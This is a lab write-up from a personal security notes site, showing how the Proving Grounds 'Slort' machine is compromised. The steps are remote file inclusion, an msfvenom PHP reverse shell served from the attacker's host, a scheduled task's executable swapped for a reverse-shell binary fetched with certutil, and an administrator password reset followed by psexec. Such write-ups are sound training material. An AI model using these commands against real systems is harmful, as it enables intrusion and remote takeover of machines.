fg0x0's notes
  • 👀Introduction
    • 🏴‍☠️About me
  • 👾offensive-security
    • 🐲OSCP
      • 🛡️Active Directory ( OSCP )
    • ⛓️OSEP
    • 🕸️OSWE
    • 🌌PG-Practice
      • 🏴‍☠️Warm UP
        • 🐧ClamAV
        • 🪟Algernon
        • 🪟Helpdesk
      • 🏴‍☠️Get to Work
        • 🪟Hutch
        • 🪟Jacko
        • 🪟Shenzi
        • 🪟Slort
        • 🐧Postfish
        • 🐧Pelican
        • 🐧Quackerjack
        • 🐧Snookums
        • 🐧Sorcerer
        • 🐧Walla
        • 🐧ZenPhoto
        • 🐧Zino
      • 🏴‍☠️Try Harder
        • 🐧Peppo
        • 🐧Sirol
      • 🏴‍☠️Retired Play Machines
  • 🚩Red Team
    • ☢️Active Directory Exploitation
      • ⚔️Domain Enumeration
      • ⚔️Local Privilege Escalation
    • 👿Red Teaming Zero to Hero
    • 👿Red Teaming All The Things
    • 🕸️Web Exploitation
      • ⚔️XSS (Cross-Site Scripting)
      • ⚔️Remote File Inclusion
      • ⚔️HTML smuggling
    • 💀Binary Exploitation
      • ⚔️Buffer Overflow
      • ⚔️Return Oriented Programming ( ROP )
      • ⚔️Binary Security
      • ⚔️Format String Vulnerability
      • ⚔️Registers
    • ☠️Exploit Development
      • ⚔️Macro Shellcode
      • ⚔️Payloads
  • 🏳️Blue Team
    • 🔍Digital Forensics
    • 🔐Cryptography & Math
      • ⚔️OpenSSL
    • ⏪Reverse Engineering
  • 🏴‍☠️ctf
    • 🏇Haruul Zangi
      • 🏴HZ-2018
        • ⚔️Final-Shao Kahn
      • 🏴HZ-2019
        • ⚔️Final-Уртасгасан-Хээээээээээээээээш
        • ⚔️Final-Skywalker-sage-info
        • ⚔️Round-1-Very Secure LDAP
        • ⚔️Round-1-Web Warmup
      • 🏴HZ-2020
        • ⚔️Round-1-websploit1
        • ⚔️Round-1-websploit2
        • ⚔️Round-1-websploit3
      • 🏴HZ-2021
        • ⚔️Final-Screenshot 1,2
        • ⚔️Final-Orb
      • 🏴HZ-2022
        • ⚔️HZ-2022-Final-You Have Been Hacked
        • ⚔️HZ-2022-Final-Breaking News
        • ⚔️HZ-2022-Final-Todo
        • ⚔️HZ-2022-Final-Subway Surfers
        • ⚔️HZ-2022-Round-2-Spike-Boom-!!!
      • 🏴HZ-2023
        • 👻Round-1
        • 👻Round-2
        • 👻Round-3
          • 🦆Ducky Notes
          • 🚋Aylagch
          • 🔻Web Downchecker
          • 🔑Password Manager
      • 🐣HZ-U18-2023
        • 🔍Forensics
        • ☄️Trivia
        • 🕸️Web
        • 🔢Crypto
        • 🌏Misc
      • 🏴HZ-2024
        • Round-1
          • M4th
        • Round-2
          • Enigma
        • Final-Round
          • 💀heavy one ( forensics )
    • 🏴‍☠️Other CTF
      • 🏜️Shambala-2056
        • 🇦🇷Argentina-PWN (pwn1)
        • 🇪🇬Egypt-Forensics (spectre)
      • 🏴‍☠️SICT CTF
        • 🎮null
      • 🌏Asian Cyber Security Challenge
        • 🌏ACSC ( 2023 )
          • 🏴‍☠️Merkle Hellman ( Cryptography )
          • 🏴‍☠️easySSTI ( Web Exploitation )
          • 🏴‍☠️Hardware is not so hard
  • 🧊HackTheBox
    • 🪟Windows Machine
      • 🤕Support
      • ❌Escape
      • ✈️Flight
      • ☢️Active
    • 🐧Linux Machine
    • ☠️Other Platform Machines
      • ⚔️HMV-Alzheimer
      • ⚔️HMV-BaseME
      • ⚔️HMV-doc
    • Web Exploitation
      • 👽Flask SSTI
        • Templated
        • baby interdimensional internet
        • 👽baby todo or not todo
        • Slippy ( Jinja2 )
      • Injection
        • 👽Phonebook ( LDAP Injection )
        • sanitize ( SQL Injection )
        • Weather app ( SQL Injection )
        • Intergalactic Post ( php filter SQLi )
        • C.O.P ( SQL injection + Revshell )
      • 💥Prototype Pollution
        • ☠️baby breaking grad
      • 😵‍💫insecure deserialization
        • 👽baby website rick ( insecure deserialization )
      • XSS
        • 👽Full Stack Conf (Cross-Site Scripting)
        • AbuseHumandb ( XSS Puppeteer )
        • Kryptos Support ( XSS+IDOR )
        • Felonious Forums ( XSS, Cache Poison, Directory Traversal )
      • 👾Symfony
        • 💀baby bonechewercon ( Symfony )
      • 👥XXE
        • 🤙baby WAFfles order
      • Ping submit hiideg
        • Looking Glass ( Ping )
      • RCE
        • LoveTok ( RCE )
        • Neonify ( RCE )
        • Amidst Us ( image+RCE )
        • Letter Despair ( PHP + RCE )
        • Debugger Unchained ( SQLi+RCE )
      • LFI
        • toxic ( LFI )
      • File Upload
        • petpet rcbee ( file upload )
      • URL submit hiideg
        • baby CachedView ( URL submit hiideg )
      • Invoice ilgeedeg
        • Blinker Fluids
      • HTTP2 smuggling
        • PhishTale ( HTTP2 smuggling, Twig N-Day )
    • Forensics
  • 💀Synack Red Team
    • ☠️DC-1 ( kh )
    • ☠️DC-2 ( kh )
    • ☠️DC-3 ( kh )
  • dursamj
Powered by GitBook
On this page
  1. offensive-security
  2. PG-Practice
  3. Get to Work

Slort

PreviousShenziNextPostfish

Last updated 1 year ago

Nmap

sudo nmap 192.168.230.53 -p- -sS -sV

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC

Both port 8080 and 4443 contain the same web directory redirecting both to the /dashboard/ directory for XAMPP.

Running dirsearch.py against the target reveals the /site page.

python3 dirsearch.py -u http://192.168.230.53:8080 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url

The /site/index.php page:

Paying close attention to the full address of the index.php page we can see the following:

http://192.168.230.53:8080/site/index.php?page=main.php

Looking at the part index.php?page=<Value> we can test for RFI to see if vulnerable. I created a test.txt file on my attacking machine and then hosted the directory with a Python SimpleHTTPServer. Then browsed to the following:

http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/test.txt

This confirms RFI:

As we know we are running PHP we can generate a PHP reverse shell with msfvenom in order to catch a reverse shell using the RFI.

msfvenom -p php/reverse_php LHOST=192.168.49.230 LPORT=21 -f raw > phpreverseshell.php

Host this in the same directory as the Python SimpleHTTPServer and ensure the listening port is set to 21. Then in the browser browse to the shell we just generated.

http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/phpreverseshell.php

Once we are connected we are running as the user rupert. Looking through the C:\ root directory we have a folder called backup. Looking at the contents within and reading info.txt we see that the note mentions TFTP.EXE is executed every 5 minutes.

I was able to delete TFTP.EXE which means we can replace it with a malicious shell. Knowing this we can generate a reverse shell with msfvenom and call it TFTP.EXE.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.230 LPORT=21 -f exe > TFTP.EXE

The shell was then uploaded with certutil.exe.

certutil.exe -f -urlcache -split http://192.168.49.230/TFTP.EXE

A netcat listener was set up on port 21 and after 5 minutes the TFTP.EXE was executed as part of the scheduled task and we receive an administrator shell.

As we are administrator we can then escalate to SYSTEM by fist changing the administrator password:

net user administrator Password123

Then using Psexec.py to gain shell as SYSTEM.

sudo python2 psexec.py /administrator:Password123@192.168.230.53
👾
🌌
🏴‍☠️
🪟